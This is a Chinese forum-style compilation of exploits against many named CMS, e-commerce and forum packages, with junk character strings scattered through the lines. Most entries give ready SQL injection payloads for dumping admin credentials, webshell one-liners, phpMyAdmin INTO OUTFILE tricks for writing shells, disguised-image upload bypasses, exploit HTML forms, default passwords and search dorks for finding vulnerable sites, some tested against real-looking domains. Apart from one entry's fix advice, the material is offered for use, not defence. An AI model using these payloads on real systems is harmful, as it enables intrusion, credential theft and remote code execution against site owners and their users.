启航企业建站系统 cookie注入漏洞通杀所有版本
& ?1 W0 U' G4 b7 A% ?/ g4 p+ X; l, J" Z! H' m: t2 m, m
直接上exploit:
# p4 W5 o9 n9 v5 A: Vjavascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));' x6 Y* U+ A) l$ a" K
test:http://www.tb11.net/system/xitong/shownews.asp?id=2106 ]0 A0 H J: s
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3 e! J2 {" k& k8 TAsprain论坛 注册用户 上传图片就可拿到webshell
^7 K( Y7 n! Q1 r% T, ?# `# \3 c! r3 l+ D# C$ s
Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。6 @9 e" V' g! ? \% m0 `
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>/ R6 G8 F4 e! G1 }" ^1 J
2.gif 为一小图片文件,一定要小,比如qq表情图片- ?7 S9 @9 |! }/ |! s% P
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用! s$ g! q' A$ h# w" `
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
. S" @; \: U8 @3 T3 H: Y5.q.asp;.gif4 }6 U9 u i* G2 `- K. a) h/ u
google:Powered by Asprain
1 k$ S P# c+ {, Y--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
9 H& n& G! Y0 J9 B Z. t
S/ k$ D' N6 DShopNum1全部系统存在上传漏洞。$ W4 k+ Z0 a5 L: e/ v
# L1 a0 a3 D0 p, w: A) Y! [4 p4 h首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。! n) g$ a( u( F( L- b' z+ E% L" o
按说明 提示登录后台。。" L- M/ G2 U- Y+ P6 ]0 ?" `
在后台功能页面->附件管理->附件列表9 P- L9 `" z8 T- n
可以直接上传.aspx 后缀木马7 M# P S' T# {0 f! S2 f* t
http://demo.shopnum1.com/upload/20110720083822500.aspx+ K" N! z! b+ r9 f; N5 c r) i
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 ?2 \9 V. X8 d, e) ]( a4 D" k6 S* b7 e5 b
牛牛CMS中小企业网站管理系统 上传漏洞
3 ]) l1 p/ P+ Q$ Y& e* ]( o
# o7 s2 y* w" i, e9 E牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
# }/ Y& y2 T7 \- \& f8 t: W后台:admin/login.asp3 i4 `+ n. X4 x5 J0 P
ewebeditor 5.5 Nday, [: v5 K9 e5 P# P3 \" t" T5 j7 ~
exp:
2 |- @4 z* M( M0 { S# m! s, K<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?0 n7 h o, Q& ?! Z2 |; W0 f- h
<input?type=file?name=uploadfile?size=100><br><br>?, W$ s7 A% y- v: J0 M
<input?type=submit?value=upload>?9 Q) u( B4 x. M! k1 N; I
</form>! F) _, h( K/ a3 c0 G: P( l
ps:先上传小马.
2 T# Z9 O! ^6 {& Y {- [5 xinurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏9 i1 O( p/ g8 a
& o: q& t6 P% y) s }- C
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
* {0 O+ P% K2 b
0 U5 @% m$ T2 Y+ n$ @$ ]# ^YothCMS 遍历目录漏洞
) L: y& R l8 q8 J
8 g. k5 j4 B* z, H+ f) _+ o优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
0 r' u( X# p6 R/ x1 E: Y) r) Q6 S默认后台:admin/login.asp& O& R5 H* P" a* N4 i* r8 \9 M
遍历目录:/ a# u! l0 W4 I- A
ewebeditor/manage/upload.asp?id=1&dir=../
7 s$ X% ], }5 J, c" H, ]% b2 [) cdata:- S1 t/ I$ `4 {: \9 P
http://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa0 M/ i0 @% X& l3 M/ ~
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------9 s. m. G, M8 A0 F5 ?% d* [* D
$ r; v/ }% C' p7 }# F! o
Net112企业建站系统 1.0
E% r8 a: u) T S. L o
+ V- u; P# p7 ]- S4 g0 s8 ^. E源码简介:
. d8 [. z8 ^* n+ `' b" nNet112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。: o: J8 a; y) p
添加管理员:4 q ?1 K( W' u! [( s7 h
http://www.0855.tv/admin/admin.asp?action=add&level=2
/ R' ]; D9 A& m* ?1 @其实加不加都不是很重要,后台文件都没怎么作验证。
5 z& Y( ?8 D, R+ ?! F. g ~上传路径:3 i# Q: Q% C& X6 V6 b `, V5 F
http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200
- L4 h& v, I) C+ g3 q, q+ K. M: J% C# }http://www.0855.tv/inc/Upfile.asp?Stype=26 `3 e" k* z' ]7 e
怎么利用自己研究。! Q; W$ }- V$ k. C9 A3 D
遍历目录:
* j- P; s; ~5 k$ Yhttp://www.0855.tv/admin/upfile.asp?path=../..0 C; e) X' s5 e4 V) M
如:1 w& p3 a1 c6 V$ a
http://www.0855.tv/admin/upfile.asp?path=../admin( |; e8 g b9 K) A& {% u B b
http://www.0855.tv/admin/upfile.asp?path=../data; K. F; N5 F# [7 |; q
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
& d6 G' i+ R& [& o7 t' U- M: f0 s/ |$ o
易和阳光购物商城通杀 上传漏洞, Y7 @% l) ?$ o
F0 X* s c. t$ | V
前提要求是IIS6.0+asp坏境。
1 d) o& }+ K9 `漏洞文件Iheeo_upfile.asp
( i- O$ Y- v" B: O# W; ^2 L过滤不严.直接可以iis6.0上传
5 H, B/ ~+ E) r# F把ASP木马改成0855.asp;1.gif
# _" Q. {/ ^/ ^$ X直接放到明小子上传
/ }$ z" j2 v, `" C3 vGoogle搜索:inurl:product.asp?Iheeoid=7 q# A0 I6 n! U a6 `' F" H
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------8 M9 O" f! W+ ~
" }6 m2 A, K: o& a) a
phpmyadmin后台4种拿shell方法5 b1 {2 d' H& o( _. [
+ s$ S9 }; X' D2 e) z A方法一:5 y* J: ]3 p C3 _, p& F3 x [0 {
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
. g3 J' o( k5 l/ `% F) Z" M1 nINSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');. W5 F W- j$ a
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
9 T8 n7 t7 A4 [: `( G! H----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php( A9 J4 F4 L1 f6 J6 c. d
一句话连接密码:xiaoma$ L9 m& ^) q0 k! X: u% p% n
方法二:) | V" n& y# C- ]" M6 Z' ^
Create TABLE xiaoma (xiaoma1 text NOT NULL);
- h6 Y7 M% a. a V' OInsert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
) p- M/ {9 C9 E# g, K* H; F8 Wselect xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
* k$ F/ \* i% Y" c7 M6 hDrop TABLE IF EXISTS xiaoma;, j& _, M# E* L1 w0 o7 y- R8 Q
方法三:
7 R! @+ {7 k+ V' T& m读取文件内容: select load_file('E:/xamp/www/s.php');
( y, Q$ a8 e% A3 f2 Q4 @+ T8 \写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
5 C8 @6 N g* t# wcmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'" Z, N2 ^ ^; b9 Y
方法四:
) m) R- m8 e3 ?+ n% ?0 oselect load_file('E:/xamp/www/xiaoma.php');- P8 z0 ~' o" J+ \8 d
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
: y8 Y7 Q" J& u' {8 S) l然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir6 \- {$ b# f H4 Q7 Y
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
; ~& ~1 I+ t8 r: G- U% l3 a1 j
4 w4 v7 k4 h5 l6 `( [$ j" R4 S7 o传信网络独立开发网站源码0day漏洞
" e7 K) r& o2 \, J% N# X- B; B. q
' g3 x `: i$ \/ c0 B后台system/login.asp" H' ~% T" O2 j7 Y, n5 e
进了后台有个ewebeditor, U! R1 l7 {. \5 l- m
Google 搜索inurl:product1.asp?tyc=9 J% c- b( `3 `" \1 E
编辑器漏洞默认后台ubbcode/admin_login.asp
& V/ `0 X4 b. i% x数据库ubbcode/db/ewebeditor.mdb7 b6 v P$ O. D1 g& \
默认账号密码yzm 111111
' e. O5 v% t7 G
7 {( l$ _% X' Y r$ a( N拿webshell方法1 y3 P! p9 p% M* z# u9 _. E
登陆后台点击“样式管理”-选择新增样式
5 a, y7 |, ?+ x: z$ w# v* i样式名称:scriptkiddies 随便写 $ q# m/ ~1 X% b5 W. ]6 x7 [
路径模式:选择绝对路径 4 | S3 }: C" X7 Y7 \# p
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx, }4 e. F' H- b1 a3 @" |' u
图片类型比如就是我们要上传的ASP木马格式1 S; `) P, w3 I6 Q% {/ B9 @9 N! m
上传路径:/( ?# u5 t) P* i- }& X f% _
图片限制:写上1000 免的上不了我们的asp木马
Q% H$ l$ p9 ^: P! B& m上传内容不要写
9 s, w! A2 X' N: k& x& [可以提交了
7 d: a1 \1 d U) c样式增加成功!
8 S$ D) x, i8 F7 R% K5 R返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
/ v2 R7 t" Z2 n' W按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置 Y5 {7 P& \# z9 p* I
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies( I _; g* L( i1 {7 v
上ASP木马 回车 等到路径+ S E, s/ p0 @* \
1 r3 r& x1 d! t# }! K后台:system/login.asp* V5 |2 H5 v+ I+ B V# @) ^# `
Exp:4 c+ [- c9 Y P0 G
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
! [8 q2 H3 ^( H测试:
/ [! f3 }# _" b; |# |# ]. Q" Bhttp://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master- L- j8 B& q5 t7 {/ h
http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
- u A; ^0 i1 S A" h--------------------------------------------------------------------------------------------------------------------------------------------------------------------------4 ^3 D( R$ g$ z* p( ? q
9 g- M, `9 T' @( E1 \' m
foosun 0day 最新注入漏洞3 K) `( [, A+ f" d; j; X
8 j& G0 h% Q& N' L# E漏洞文件:www.xxx.com/user/SetNextOptions.asp
4 B3 T1 @6 P" t9 F( O. p1 q/ m利用简单的方法:
7 G3 R8 Z- b4 @3 m暴管理员帐号:8 b. ]! L% M0 e8 J" n9 Y
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
1 @- v+ R1 s: M1 U暴管理员密码: Z% _/ m0 R& x# O+ c- \4 i/ E Z
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,6 P5 X5 d9 A2 s- M
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------) O3 P) t, m" F7 ]7 D& g) g
~3 O, o8 j# U% m2 @$ k
网站程序的版权未知!
# }7 }% {0 B0 n* @0 |
! _, C7 _$ {! p1 z; T# u默认网站数据库:
" x* ` c! i, S: ]' r `8 Swww.i0day.com/data/nxnews.mdb
, }& w4 I: F) p Y9 Cewebeditor 在线编辑器:, w X# U9 K2 |+ G
编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb" X4 `4 ]2 y) ^' R. Y
登录地址:ewebeditor/admin_login.asp
) p2 J7 v) a( c8 G; S4 X默认密码:admin admin
( b# C% Z( I% u/ Z$ a+ [1 N$ \/ x9 q登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data/ H4 E8 E- E) t) y
( e& I9 P6 \" S9 S: f; T6 R7 P+ LSql注入漏洞:
/ I8 f& y2 ^. q7 z. `- ahttp://www.i0day.com/detail.asp?id=12& ^5 P3 H/ L+ N! U) \6 g1 z
exp:" i6 J0 y( a6 d; a5 ]& h7 V
union select 1,admin,password,4,5,6,7,8 from admin9 x: ?# n3 n+ k* X E
爆出明文帐号/密码
3 o/ x# v1 w0 ]5 E& i: N k8 u/ Q! y- D! u# p D- C& `. k
上传漏洞:' p9 q, M% h! U% ~# P \8 Q
后台+upfile.asp
5 S6 `9 ?; e+ J) V7 i, T如:
* E3 F% K, M9 b% ?) D! p2 s' Nhttp://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。: p+ P3 T- p# `" S2 {
shell的地址:网址+后台+成功上传的马" e% z: K7 n# l f: k
google:inurl:news.asp?lanmuName=
- `' q5 R3 J' r0 y& g------------------------------------------------------------------------------------------------------------------------------------------------------------------------" O" K9 f$ C+ @' m8 {# e1 }
. v+ U, x$ I+ k3 @3 o
dedecms最新0day利用不进后台直接拿WEBSHELL
1 Y. O. | G4 a) a0 N$ x( D: e/ D/ Z' [8 K
拿webshell的方法如下:
7 [$ ^: E$ C, x3 [网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.* S, J( K9 F' a! `% Y. u2 E
前题条件,必须准备好自己的dede数据库,然后插入数据:
/ _/ V k4 X+ J' P1 k1 b/ k9 Einsert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
; F3 @- S# \3 s1 |- \: M) P+ v: y
( V% a/ l9 i) D& s7 ?再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
' ]% |9 [; G1 p5 l! N<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">: V' V5 v4 U% v+ T& X7 g; n* L
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
" n3 I$ F1 ~% t' K ~<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />2 b; Y1 ~. Y1 `4 j8 ~7 v" v M. y
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />+ P( i) Y' R& c2 h& T8 ^0 Y
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />' T5 J# @# ]6 h8 m$ `' l& F
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
& H$ e1 L1 k3 ^8 O8 ]<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />$ s, i& d, ~$ x% S6 L
<input type="text" value="true" name="nocache" style="width:400">7 _0 Y( s& |: D* b5 ^/ q6 C
<input type="submit" value="提交" name="QuickSearchBtn"><br />
3 t/ p9 S1 ^0 v</form>5 x, N6 O, s0 Z8 m$ B4 `
<script>/ t8 Z! I* L5 _1 t G7 l
function addaction()2 h" O8 o' V: ~
{5 a, v( G1 l, ~& r* W3 L, q
document.QuickSearch.action=document.QuickSearch.doaction.value;- ^/ n& ^8 x' a" n5 t
}
7 R; [) s' c% v" m/ z) a</script>+ u, C' L: F( U& { [
-----------------------------------------------------------------------------------------------------------------------------------------------$ `* @' z0 R7 L9 R, e3 N& W
) a+ M% m" m3 L! K& e. o8 tdedecms织梦暴最新严重0day漏洞, Q5 d( L5 T9 a0 k" u) j
bug被利用步骤如下:
* ]$ n6 V' I2 d* J6 f: s6 H; G# ghttp://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
; `5 `9 K+ _- Z把上面{}上的字母改为当前的验证码,即可直接进入网站后台。9 g: v$ S- i& i' x: S- r' w
-------------------------------------------------------------------------------------------------------------------------------------------/ `; Y( E* C; n) ?/ \5 G- N" c
% n( o# U e: z: R1 ^2 e6 O. @! j多多淘宝客程序上传漏洞 4 @# I% [% V# U8 N8 \
漏洞页面:
, K0 \3 Z) P/ f0 u* Sadmin\upload_pic.php0 m( I4 h3 R& Y, J
传送门:3 W( d" s8 d4 J/ f; c
http://www.www.com/admin/upload_pic.php?uploadtext=slide13 _/ O6 T# Z6 @4 Q4 U6 C& t+ j, q
PS:copy张图片马 直接 xxx.php 上传抓包地址!
1 q; D+ l( Z7 m" {1 i& ?------------------------------------------------------------------------------------------------------------------------------------------------------
: G7 r7 s# w% b4 h- M3 P l5 g8 G+ r9 x$ L \
无忧公司系统ASP专业版后台上传漏洞
s- |. T G6 N8 m漏洞文件 后台上传" D2 ]! P! k; e% t$ X
admin/uploadPic.asp
; }% _% G; R0 I( d) i; r5 R漏洞利用 这个漏洞好像是雷池的
; i( e) b% g! I. v% h M2 ^http://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1$ t D+ Y# D- O* {* D
等到的webshell路径:
+ c% m8 @+ k& ~# d w& S- ^/UploadFiles/scriptkiddies.asp;_2.gif, ]& {. T, v9 w6 Z9 j# x$ y7 h
---------------------------------------------------------------------------------------------------------------------------------------------------! J. E1 s- U% n# N
e% q9 s: v$ h3 n- v6 P
住哪酒店分销联盟系统2010" C6 L" h4 i6 |) l$ ^
Search:
1 G' s, R3 _2 Sinurl:index.php?m=hotelinfo3 N& w1 Q L9 N! A5 G- F
http://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
; w4 G7 y5 Z( d; c默认后台:index.php?m=admin/login
) j' ^5 b( l4 u: y. I3 ?( D--------------------------------------------------------------------------------------------------------------------------------------------------" o0 V2 y6 P$ u# U3 [; J. ?7 t3 O% i
( o! X1 K! t. H; @) qinurl:info_Print.asp?ArticleID=
; b/ x( B6 N r# ` l2 L后台 ad_login.asp
6 a8 b; v" B2 Q, ^+ z1 b) T爆管理员密码:
) e7 X% o, l; W9 s4 ?' J% {) [union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
/ f. y. V8 N6 g- n2 a------------------------------------------------------------------------------------------------------------------------------------------------------------
4 @1 J) d" ?/ _3 t6 n5 d$ y" U
: x: ^$ `: ]0 x" R4 f) o" ]6 k搜索框漏洞!2 Q8 A; f# m/ ~' L; M
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
& L e+ }' V% c* L- w--------------------------------------------------------------------------------------------------------------------------------------------------------8 ]( n( }- f9 a) J: m
- n, P) ?# O0 N# }
关键字:
r2 E& `4 u* \" [& Minurl:/reg_TemletSel.asp?step=2
: x. N" m- X' J; C2 U或者* X1 f7 B5 v9 F. r
电子商务自助建站--您理想的助手- V, Y) G" j, o% Z
-------------------------------------------------------------------------------------------------------------------------------------------------
1 `' \5 O4 G* o0 j5 p6 N3 f& r! V- _/ b) k- M8 J$ \
iGiveTest 2.1.0注入漏洞
' V3 O7 t `: I' gVersion: <= 2.1.0, D# ?' O! c e* o
# Homepage: http://iGiveTest.com/
% ]( ~9 t+ E* S* ~) Y2 b谷歌关键字: “Powered by iGiveTest”
. G; N; J$ P+ _" J: F随便注册一个帐号。然后暴管理员帐号和密码
/ |2 n; x" Y1 Yhttp://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (13 _3 Y5 \& v H0 V r! Q4 g
------------------------------------------------------------------------------------------------------------------------------------------------! b! S2 `- H( o: i, I" [0 y4 C
4 E' \; a# l- n4 q3 T9 c8 |- ?* n
CKXP网上书店注入漏洞
* @* S+ G3 s) S工具加表:shop_admin 加字段:admin
7 o, T% u' f) u' {( R: C8 S5 W后台:admin/login.asp
" @# |& W4 y2 z+ ]& f登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/) Q0 P0 i" V! g9 o, H" B% e
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息 x- Q5 g& h" n
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
. ^5 C& P4 C8 p& m
8 k o B' e- X* N2 k段富超个人网站系统留言本写马漏洞
, [2 l% R2 f/ L7 ^3 w3 l; f源码下载:http://www.mycodes.net/24/2149.htm o5 U$ O( V# N7 B- r
addgbook.asp 提交一句话。
K% C( z' M+ l6 H; f+ Z连接: http://www.xxxx.tv/date/date3f.asp# x) K2 J/ s5 M3 v( R
google:为防批量,特略!# A/ l7 A1 d6 E$ h6 `, j
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
) w; `# K+ Y% w, c2 A# C( P
8 r: M' A+ A& {1 `智有道专业旅游系统v1.0 注入及列目录漏洞/ T# `4 R2 Z8 ~1 n3 {
默认后台路径:/admin/login.asp
: T6 J% q8 E2 U默认管理员:admin( c9 r% T! @$ D0 d
默认密码:123456- F$ ?+ s8 G6 m5 ~
SQL EXP Tset:9 k! H( i6 o+ Y, ^
http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin6 u* O; c) u+ g, l/ @8 ^0 U
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- G& j5 ?& a1 e' b/ m: ?# P1 A& L* ?5 N! d/ t% `& F. _
ewebeditor(PHP) Ver 3.8 本任意文件上传0day: ]1 M& s5 x9 w! w/ D# Q' E
EXP:1 u- Y. q: i+ T; x# f2 K
<title>eWebeditoR3.8 for php任意文件上EXP</title>
1 u2 a9 E+ {3 H<form action="" method=post enctype="multip* m' O; a) O) J3 E" g! d g
art/form-data">
# Q# Q% D0 [( [6 b3 w3 E<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000"> ( J5 M+ O" ?! H8 X4 B
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
% q: I9 H% [( `" e<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
, E1 u( a5 x- f2 C3 ]) S8 |file:<input type=file name="uploadfile"><br>
: Y3 v% ~! i& v; r; R: c<input type=button value=submit onclick=fsubmit()> ! J' R# k3 K4 H( [3 _( I7 P' P
</form><br> " W; _ O* N4 _. t: C0 e0 x
<script> ; {9 `0 _6 S2 o; e: O
function fsubmit(){
" q& I: m. z, k. T& Rform = document.forms[0]; ! H. w# s* @9 u t c/ a
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en''; # U4 a" j8 l- M2 e
alert(form.action); + n) Q" y8 z# ?/ r
form.submit(); 4 o4 M+ U% e/ G$ B/ E, f
} ) u& u- [# o/ A
</script>4 P5 E0 g* Y3 `, w! e+ k
注意修改里面ewebeditor的名称还有路径。( h. E1 `' |" h' w
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------! w+ X5 }' ^; X& }" H* `
* c. w4 r/ G5 O3 r) j提交’时提示ip被记录 防注入系统的利用
' L6 }) J' j: N) H6 L7 e网址:http://www.xxx.com/newslist.asp?id=122′
* `1 s) i6 ?) L( b提示“你的操作已被记录!”等信息。- {0 q. Y4 w6 ?9 Y) Q, l: r+ p. t
利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。
$ X) h0 G0 t! b/ {% P----------------------------------------------------------------------------------------------------------------------------------------------------------------------------- L2 p7 G' s2 F# `
4 H- j9 Z1 C9 J8 t$ [! P3 I2 A
西部商务网站管理系统 批量拿shell-0day, x2 V! p8 ^0 `) s
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
^) [, I$ b, m; T; z1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
- |) P2 M0 Z0 h5 o( c+ Y2 r5 m2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
6 j+ X) P9 i) C O+ A3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
, z; c" r) o* A5 [---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/ N4 N ]/ `& ^1 h+ {
% T) m* E! I6 Z% G% E CJspRun!6.0 论坛管理后台注入漏洞' }& N6 b9 [; A3 N$ f P8 W
: E$ P6 ?" v, P( g1 z6 T
SEBUG-ID:20787 发布时间:2011-04-30 影响版本:
9 y' ^2 W$ s, q. a& K1 |JspRun!6.0
$ j1 D: E( N$ @) @& Y漏洞描述:
6 U7 Y0 v4 _# l1 G4 l" r6 f6 wJspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。) {) _ C, m @& c( b+ K
在处理后台提交的文件中ForumManageAction.java第1940行7 T: ~, K4 u2 v+ ~$ N& S) r5 X
String export = request.getParameter("export");//直接获取,没有安全过滤1 ^$ o1 f3 E& u) L! C( K
if(export!=null){4 }$ j9 \+ w" O2 z7 ^
List> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...
; I' `" E4 O# v8 k* B1 Pif(styles==null||styles.size()==0){
$ L4 }2 B+ p6 ?<*参考' y/ ]1 e% i$ }& W f8 G
nuanfan@gmail.com% e8 B2 n) O" s7 F% J
*> SEBUG安全建议:
! p$ d- P# k, C# V7 {www.jsprun.net
$ e* N% g# i( G/ s- s* p# Q(1)安全过滤变量export. o8 [' U0 q" J V7 R. Y8 \
(2)在查询语句中使用占位符
/ F# Z% n. ]( h% {& W" v7 N------------------------------------------------------------------------------------------------------------------------------------------------------------------------------7 r& j5 Z i- k* w4 t; v
) r' _$ T( h" S$ q+ J, {) `7 _
乌邦图企业网站系统 cookies 注入
0 c) S }6 @/ d" A) k$ @
4 ?! ?( u3 c$ {6 B4 a) B程序完整登陆后台:/admin/login.asp8 A9 v/ A4 y! D2 x2 Q9 ^
默认登陆帐号:admin 密码:admin888
5 i# `3 G% V; b Z语句:(前面加个空格)
9 n$ `- x5 ^ b6 qand 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
5 j% Z& w2 [8 {( H0 g5 I* O或者是16个字段:9 C& F: w5 a+ ^* H% I: S! k1 j
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
, @' |' W! [) K爆不出来自己猜字段。
" M. [+ v) U$ N+ e5 _注入点:http://www.untnt.com/shownews.asp?=88' W8 w* Q/ I5 {2 N
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
7 r- ]8 s+ i- W关键字:
2 D+ e0 h- n: z0 ^" binurl:shownews?asp.id=% L' M `& o2 ]1 x/ I
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$ O- T+ H N& ?( Z
6 m t0 Z7 f8 D! c3 R' ?8 oCKXP网上书店注入漏洞5 w( K m6 J. ]! T0 r$ [3 x4 ?
1 ]) O V( W' x+ N- J; ~工具加表:shop_admin 加字段:admin; V- S w0 `! n# v8 X% D2 f n D
后台:admin/login.asp ) ~' Y+ i, _6 f( b) m9 m# k) W
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
. r/ Y# I! J8 c* d+ H% _inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
5 Y' e% |5 ]2 i0 I0 w n$ q9 S---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- y5 E- `' g$ p" L4 {1 c1 y
" q) K7 X2 _3 {YxShop易想购物商城4.7.1版本任意文件上传漏洞* ]- n$ `+ o8 \9 M6 {
9 ` z* |" c: W7 t! j
http://xxoo.com/controls/fckedit ... aspx/connector.aspx
# e) B8 H+ e9 Q' A( }# H跳转到网站根目录上传任意文件。9 b* c- C1 K: w' Y7 D" R& @' O
如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件! A. ^9 F) I- ^6 H9 n2 W
